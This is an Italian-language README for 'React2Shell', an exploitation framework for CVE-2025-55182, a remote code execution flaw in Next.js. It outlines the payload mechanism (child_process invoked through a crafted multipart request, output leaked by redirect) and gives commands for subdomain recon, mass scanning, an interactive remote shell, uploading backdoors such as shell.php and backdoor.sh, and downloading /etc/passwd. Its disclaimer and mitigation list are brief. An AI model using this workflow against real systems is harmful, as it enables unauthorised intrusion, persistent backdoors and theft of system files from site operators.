🚨 React2Shell - CVE-2025-55182 Exploitation Framework

Framework di exploitation avanzato per CVE-2025-55182 (Remote Code Execution su Next.js)
Autore: opsecramdan
📚 Indice
- Panoramica
- Dettagli della Vulnerabilità
- Funzionalità
- Requisiti
- Installazione
- Utilizzo
- Shell Interattiva
- File di Output
- Impatto
- Mitigazione
- Limitazioni
- Disclaimer
📌 Panoramica
React2Shell è un framework di exploitation per identificare e sfruttare la vulnerabilità CVE-2025-55182 nelle applicazioni basate su Next.js.
Questo tool è progettato come un kit offensivo all-in-one che include:
- Enumerazione dei sottodomini
- Scansione delle vulnerabilità
- Motore di exploitation
- Shell remota interattiva
🔍 Dettagli della Vulnerabilità
- CVE ID: CVE-2025-55182
- Tipo: Remote Code Execution (RCE)
- Piattaforma: Next.js
- Vettore d'attacco: Richiesta multipart/form-data dannosa
- Impatto: Esecuzione arbitraria di comandi
🧠 Causa Principale
Questa vulnerabilità sfrutta il meccanismo interno di Next.js nel seguente modo:
- Iniettare il payload nella richiesta
- Invocare: process.mainModule.require('child_process')
- Eseguire un comando del sistema operativo
- Codificare l'output in Base64
- Divulgare il risultato tramite redirect (
/login?a=)
⚙️ Funzionalità
🔎 Enumerazione dei Sottodomini
- Scansione DNS + HTTP
- Wordlist integrata
- Supporto per wordlist personalizzate
- Salvataggio automatico dei risultati
🧪 Scanner di Vulnerabilità
- Test su più endpoint:
/
/api
/api/auth
/_next
/admin
/dashboard
- Analisi di header e risposte
- Riduzione dei falsi positivi
💣 Motore di Exploitation
- Generazione automatica del payload
- Esecuzione codificata in Base64
- Estrazione dell'output tramite redirect
🖥️ Shell Interattiva
- Esecuzione remota di comandi
- Sessione persistente
- Tracciamento della directory
📂 Operazioni sui File
- Caricamento file
- Download file
- Creazione file
👑 Modalità Root
- Esecuzione di
sudo -i
- Simulazione di escalation dei privilegi
📦 Requisiti
Installa le dipendenze:
pip install requests dnspython
📥 Installazione
1. Clonare il Repository
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
2. Entrare nella directory
cd react2shell-cve-2025-55182
python3 react2shell.py
🚀 Utilizzo
🎯 Singolo Target
python3 react2shell.py -u https://target.com
Senza protocollo:
python3 react2shell.py -u target.com
📄 Target Multipli
python3 react2shell.py -f targets.txt
Esempio di contenuto di targets.txt:
https://target1.com
http://target2.com:3000
target3.com
🌐 Modalità Completa (Recon + Scan + Exploit)
python3 react2shell.py -d example.com
Flusso:
- Enumerazione dei sottodomini
- Scansione delle vulnerabilità
- Exploitation (opzionale)
📚 Wordlist Personalizzata
python3 react2shell.py -d example.com -w wordlist.txt
🐞 Modalità Debug
python3 react2shell.py -d example.com --debug
🖥️ Shell Interattiva
Dopo che l'exploit ha avuto successo, otterrai l'accesso alla shell.
Comandi di Base
whoami
id
uname -a
pwd
ls -lah
⚙️ Comandi Speciali
📂 Caricamento File
.upload shell.php /tmp/shell.php
📥 Download File
.download /etc/passwd
📄 Creazione File
.create /tmp/test.txt
🔄 Esempio di Flusso di Lavoro
1. Scansione del dominio
python3 react2shell.py -d example.com
2. Identificare il target vulnerabile
3. Entrare nella shell
whoami
4. Caricare il payload
.upload backdoor.sh /tmp/backdoor.sh
📁 File di Output
Il tool genererà:
- subdomains_*.txt
- vulnerable_*.txt
- output_*.txt
⚠️ Impatto
Se sfruttato con successo:
- Esecuzione remota di comandi
- Accesso a file sensibili
- Caricamento di backdoor
- Accesso persistente
- Escalation dei privilegi
🛡️ Mitigazione
- Aggiornare Next.js all'ultima versione
- Limitare gli endpoint interni
- Validare rigorosamente gli input
- Utilizzare un WAF (OWASP CRS)
- Monitorare le attività anomale
⚠️ Disclaimer
Questo tool è stato creato solo per:
- Apprendimento
- Ricerca
- Test di penetrazione autorizzati
È vietato l'uso per attività illegali.
⭐ Note
Questo progetto dimostra:
- Competenze avanzate di exploitation
- Comprensione degli internals di Next.js
- Simulazione di attacchi real-world